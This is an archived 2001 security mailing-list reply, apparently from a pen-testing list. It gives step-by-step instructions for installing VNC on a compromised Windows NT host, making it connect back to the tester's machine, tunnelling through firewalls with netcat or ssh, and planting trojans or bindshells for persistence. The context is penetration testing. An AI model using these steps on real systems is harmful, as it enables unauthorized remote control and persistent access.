On Sunday 16 September 2001 04:18 pm, Rainer Duffner wrote: > Hi, [ snip ] > Even with hk.exe, NET USE fails. Is there an explanation ? One strategy for getting an interactive network session is to install VNC remotely and send yourself back a desktop. The basic steps: 1. Get SYSTEM privs. 2. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to c:\winnt\system32 3. Use reg.exe, regini.exe, or regedit (NT 4.0 only) to load the default registry settings, including the password to use. You can create one of these by setting up VNC on a local machine and dumping the registry tree. 4. Run vncviewer -listen on a machine that the target box can reach on port 5500. For hardcore firewalled environments you can redirect ports with fpipe, netcat, or ssh -R/-L. 5. execute winvnc -install, then net start winvnc, and finally winvnc -connect <yourip>, type in your password and use the desktop. 6. If an Admin is logged on, the game is over, you have his/her privs. If you get a logon prompt, go create a user account then login with it ;) You can also add a trojan to the registry Run keys, the startup folder, or the network logon scripts. Idealy this trojan would drop a bindshell running in the context of the user. Also, please be sure to _remove_ any trojans or VNC services you install, theres no point in paying for a security assessment/pen-test if you are worse out then when you started. If anyone needs help getting the VNC setup going, email me, if enough people ask I will put up a tutorial... -- H D Moore http://www.digitaldefense.net - work http://www.digitaloffense.net - play ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 14:17:48 PDT